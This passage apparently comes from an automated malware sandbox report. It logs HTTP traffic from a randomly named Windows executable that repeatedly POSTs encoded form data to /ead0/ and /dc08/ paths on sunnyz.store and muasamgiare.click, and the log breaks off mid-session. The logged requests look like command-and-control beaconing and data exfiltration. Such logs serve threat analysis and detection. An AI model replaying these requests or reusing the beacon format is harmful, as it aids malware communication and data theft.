                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 6b 69 6b 79 41 50 4e 46 38 58 68 48 58 4d 2b 57 71 64 45 5a 68 6a 5a 37 52 4b 34 6e 67 52 30 64 66 6b 49 70 71 42 72 36 56 63 42
                                                                    Data Ascii: KxZ=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nykikyAPNF8XhHXM+WqdEZhjZ7RK4ngR0dfkIpqBr6VcB
                                                                    Dec 6, 2024 10:06:35.015230894 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:34 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.650022217.70.184.50805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:36.457626104 CET878OUTPOST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 65 76 4f 51 55 57 71 54 68 6c 78 76 76 65 31 65 57 6c 71 55 51 79 36 47 6f 67 7a 45 61 31 39 39 6b 58 63 36 53 67 77 6c 4c 6f 2b 4d 6d 73 6c 35 55 6e 61 7a 4b 68 67 58 42 35 4e 46 43 58 33 59 68 2f 70 68 32 34 34 39 2f 47 6b 6d 51 70 39 6f 4a 47 67 4a 49 64 37 67 66 67 55 77 56 57 4d 64 5a 49 65 41 35 32 64 38 75 4e 6b 50 51 71 63 58 66 47 53 31 56 35 39 30 58 62 37 43 72 49 59 37 61 48 50 42 52 6b 4b 5a 64 6e 4c 78 44 62 37 54 53 4b 6e 41 52 65 66 66 63 49 37 39 4e 4d 31 68 35 69 7a 4d 37 46 62 4c 7a 6e 33 79 6b 49 43 41 30 48 65 45 6a 4c 58 51 3d 3d
                                                                    Data Ascii: KxZ=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxDb7TSKnAReffcI79NM1h5izM7FbLzn3ykICA0HeEjLXQ==
                                                                    Dec 6, 2024 10:06:37.684429884 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:37 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.650025217.70.184.50805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:39.133775949 CET1891OUTPOST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 47 76 53 79 63 57 34 67 35 6c 79 76 76 65 72 4f 57 34 71 55 51 56 36 47 41 6b 7a 45 48 43 39 2f 73 58 61 62 79 67 6c 6b 4c 6f 72 63 6d 73 70 5a 55 71 55 54 4b 77 67 58 52 39 4e 42 6d 58 33 59 68 2f 70 69 75 34 6f 63 2f 47 2f 6d 51 75 72 34 4a 61 72 70 4a 79 37 67 58 65 55 77 68 6f 4d 73 35 49 66 67 70 32 4f 66 47 4e 6f 50 51 6b 64 58 65 42 53 31 5a 59 39 30 36 67 37 47 6a 75 59 38 53 48 5a 6e 38 34 59 34 6c 47 52 68 75 2b 37 45 53 4d 71 48 42 36 5a 4d 31 30 32 4f 55 39 7a 43 52 42 2f 62 6e 6c 62 71 71 5a 2b 7a 45 6e 4d 6c 46 4b 53 41 6d 51 41 31 30 6f 42 54 44 39 6a 55 5a 33 33 54 63 47 66 32 34 34 58 35 6a 53 59 6d 74 79 6b 4a 64 63 73 74 6e 66 4d 6f 54 48 32 65 44 58 68 30 5a 62 70 54 73 4b 61 70 31 64 71 45 31 72 34 42 63 5a 47 7a 35 4c 50 66 58 6a 4b 53 70 31 62 71 70 56 52 51 78 66 54 53 6f 34 39 32 43 66 66 5a 6d 55 31 67 55 32 30 50 79 78 61 69 5a 67 41 39 [TRUNCATED]
                                                                    Data Ascii: KxZ=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+GvSycW4g5lyvverOW4qUQV6GAkzEHC9/sXabyglkLorcmspZUqUTKwgXR9NBmX3Yh/piu4oc/G/mQur4JarpJy7gXeUwhoMs5Ifgp2OfGNoPQkdXeBS1ZY906g7GjuY8SHZn84Y4lGRhu+7ESMqHB6ZM102OU9zCRB/bnlbqqZ+zEnMlFKSAmQA10oBTD9jUZ33TcGf244X5jSYmtykJdcstnfMoTH2eDXh0ZbpTsKap1dqE1r4BcZGz5LPfXjKSp1bqpVRQxfTSo492CffZmU1gU20PyxaiZgA9FxkkohX11lkxmtmUmlaxUUAAtJMyip5ZzhSs+cd6YPdUsWdY0Hzk9ay8bvP5zfMQNIKVsxtPES0rlP5yJFtC7MsKG62j8nTsiFri0/lwysUaRpqG2l9wqsBEwNrqQJeHyBGg7nkBKg2ZJUEZ5OJjvHxqXjMfY9cuxIhHLSpq/3qJhEKFUwwNFDCuNU2R5vXeuckIgcCZY4tX2F6mBpxM7AH7xUxlDjNzPcSlNulPDqwiX12UhY8027ikkyZlkhGLW6JBmz1+rCJGUYjR32bXgU572KaJ1FHrBzSaI94sMkCs1FASl79XRYahZ1YNxmbxNf1/7+NU3PeTdUTaqXBIJ1RV8ttJ15LJRQQs70R85dXRcU7rRGyvBHSB0cMNI30iSpCZ3zVuurreFdjC7gRD4SItYzWXvzTHVy5NzV+uSpjiAdkMUc8XD2VGh8uQ15O1Jg4/KshQ2cqhXkCDm40b4JwjZ6reT61H+UDyQkJeVS5pShj/fz8lqjk0vbmdJbai/Dah/uHe0Aq/WY+v4WI1Yrq4N+dLrzFh+WN6/NqpeMJDPW+rI6A7LGLAUVCkadCpLn3ipeH1NsTmWuoVjddBUUWqwY6qz8PnCIF9kvel6IMnymET03B59K0HdUmaOz1zpHbiC1+5h3lvj5FuAiU3W/owDCeyPsYsdF [TRUNCATED]
                                                                    Dec 6, 2024 10:06:40.441657066 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:40 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.650026217.70.184.50805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:41.792201996 CET592OUTGET /ead0/?KxZ=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBirmmsaQUUC+82V9qNTTK4Z1SvR6iko7BzlkPk6J7u5V/wAfiNkI=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:43.025305033 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:42 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Content-Security-Policy: default-src 'self'; script-src 'nonce-ed66ee13396844e68154a824b5830174';
                                                                    Vary: Accept-Language
                                                                    Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 65 64 36 36 65 65 31 33 33 39 36 38 34 34 65 36 38 31 35 34 61 38 32 34 62 35 38 33 30 31 37 34 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                    Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-ed66ee13396844e68154a824b5830174';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                                    Dec 6, 2024 10:06:43.025383949 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                                    Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                                    Dec 6, 2024 10:06:43.025394917 CET160INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                                    Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.65002713.228.81.39805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:49.216758966 CET869OUTPOST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 67 50 30 6c 55 67 69 2f 6c 4d 75 56 6f 74 30 52 33 33 58 6a 32 78 75 7a 59 74 65 6a 52 63 63 31 75 67 79 45 65 75 54 32 51 72 39 64 39 5a 62 39 44 61 69 34 75 7a 72 76 77 30 30 66 61 2f 6d 46 39 6d 6b 43 6f 70 54 4b 39 49 50 7a 31 4e 53 68 6f 36 79 4f 6a 54 74 63 54 59 55 79 2b 6c 6d 79 61 36 58 41 51 59 74 61 44 62 44 78 76 76 46 77 39 67 51 37 59 47 37 6a 64 6f 6f 62 46 32 72 63 6c 79 44 57 35 6e 6c 57 56 57 75 4e 73 4d 55 6a 69 77 68 44 30 69 7a 76 4a 6b 36 67 4a 33 7a 52 58 2b 64 4f 68 31 4c 71 61 63 41 69 70 61 4b 72 47 78 42 67 33 4b 50 4b 77 32 48 33 66 75 78 75
                                                                    Data Ascii: KxZ=H6OXM/o3+l9agP0lUgi/lMuVot0R33Xj2xuzYtejRcc1ugyEeuT2Qr9d9Zb9Dai4uzrvw00fa/mF9mkCopTK9IPz1NSho6yOjTtcTYUy+lmya6XAQYtaDbDxvvFw9gQ7YG7jdoobF2rclyDW5nlWVWuNsMUjiwhD0izvJk6gJ3zRX+dOh1LqacAipaKrGxBg3KPKw2H3fuxu
                                                                    Dec 6, 2024 10:06:50.799555063 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:50 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.65002813.228.81.39805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:51.888916969 CET893OUTPOST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.muasamgiare.click
                                                                    Referer: http://www.muasamgiare.click/dc08/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 4d 31 75 45 69 45 66 76 54 32 52 72 39 64 79 4a 62 30 41 71 69 78 75 7a 6d 4d 77 32 51 66 61 2f 79 46 39 6b 38 43 76 65 50 4e 38 59 50 78 39 74 53 6a 31 71 79 4f 6a 54 74 63 54 59 42 6c 2b 6b 4f 79 61 4c 6e 41 52 38 78 62 66 72 44 79 6f 76 46 77 73 77 51 6e 59 47 37 64 64 70 6b 39 46 77 33 63 6c 33 6e 57 35 32 6c 56 63 57 75 50 6f 4d 56 64 6a 46 59 37 7a 7a 57 64 41 53 6d 35 58 47 4c 72 62 6f 41 55 39 47 4c 4a 49 4d 67 67 70 59 53 5a 47 52 42 4b 31 4b 33 4b 69 68 4c 51 51 61 55 4e 63 61 72 48 4b 47 43 50 36 6f 43 45 4b 58 64 6b 54 69 78 62 78 51 3d 3d
                                                                    Data Ascii: KxZ=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqM1uEiEfvT2Rr9dyJb0AqixuzmMw2Qfa/yF9k8CvePN8YPx9tSj1qyOjTtcTYBl+kOyaLnAR8xbfrDyovFwswQnYG7ddpk9Fw3cl3nW52lVcWuPoMVdjFY7zzWdASm5XGLrboAU9GLJIMggpYSZGRBK1K3KihLQQaUNcarHKGCP6oCEKXdkTixbxQ==
                                                                    Dec 6, 2024 10:06:53.469347000 CET368INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:53 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.65002913.228.81.39805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:54.546828985 CET1906OUTPOST /dc08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
